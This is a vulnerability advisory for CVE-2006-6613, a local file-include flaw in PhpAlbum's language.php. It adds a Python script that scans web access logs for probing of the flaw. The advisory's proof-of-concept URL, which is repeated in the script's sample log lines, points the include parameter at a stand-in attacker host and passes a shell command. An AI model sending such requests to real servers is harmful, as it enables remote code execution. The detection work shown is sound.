PhpAlbum Language.php Local File Include Vulnerability
BID:21519
Info
| Bugtraq ID: | 21519 |
| Class: | Input Validation Error |
| CVE: | CVE-2006-6613 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 10 2006 12:00AM |
| Updated: | Nov 05 2008 04:15PM |
| Credit: | Kacper is credited with the discovery of this vulnerability. |
| Vulnerable: | phpAlbum.net phpalbum 0.4.1 Beta 6; phpAlbum.net phpalbum 4.1 |
| Not Vulnerable: | phpAlbum.net phpalbum 4.1.14 |
Discussion
PhpAlbum is prone to a local file-include vulnerability because the application fails to properly sanitize user-supplied input.
Exploiting this issue may allow an unauthorized user to view files and to execute local scripts.
PhpAlbum 0.4.1 Beta 6 is vulnerable.
Exploit / POC
Attackers can exploit this issue via a web client.
A proof of concept demonstrating this issue is as follows:
http://example.com/[path]/language.php?cmd=ls%20-la&pa_lang[include_file]=http://attacker.com
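For defenders checking whether this issue was probed on their own server, the following added example (not part of the original advisory or of PhpAlbum) scans web access log lines for requests to language.php that supply the pa_lang[include_file] parameter shown in the proof of concept. The Common/Combined Log Format, the sample lines, and the classification labels are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
PARAM = "pa_lang[include_file]"  # parameter named in the advisory's proof of concept

# Constructed sample lines (documentation addresses, made-up paths and values).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2006:12:00:01 +0000] "GET /album/language.php?cmd=ls%20-la&pa_lang[include_file]=http://attacker.example HTTP/1.1" 200 512',
    '192.0.2.11 - - [10/Dec/2006:12:00:05 +0000] "GET /album/language.php?pa_lang%5Binclude_file%5D=..%2F..%2Fconfig.txt HTTP/1.1" 200 87',
    '198.51.100.7 - - [10/Dec/2006:12:01:00 +0000] "GET /album/language.php?lang=en HTTP/1.1" 200 1024',
    '198.51.100.8 - - [10/Dec/2006:12:01:09 +0000] "GET /album/main.php?cmd=album HTTP/1.1" 200 2048',
]

def classify(value):
    """Label a client-supplied include path by what it points at (labels are this example's own)."""
    v = unquote(value)  # undo a possible second layer of percent-encoding
    if re.match(r'^[a-z][a-z0-9+.\-]*://', v, re.I):
        return "remote-url"
    if ".." in v.replace("\\", "/").split("/"):
        return "traversal"
    if v.startswith(("/", "\\")) or re.match(r'^[A-Za-z]:[\\/]', v):
        return "absolute-path"
    return "other"

def scan(lines):
    """Return (client_ip, label, value) for every request to language.php
    whose query string carries pa_lang[include_file]."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/language.php"):
            continue
        # parse_qsl percent-decodes names, so pa_lang%5Binclude_file%5D matches too
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == PARAM:
                hits.append((m.group("ip"), classify(value), value))
    return hits

if __name__ == "__main__":
    for ip, label, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{label}\t{value}")
```

Access logs record only the query string, so the same parameter sent in a POST body would not appear in this scan.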
Solution / Fix
Solution:
The vendor has released an update. Please see the references for more information.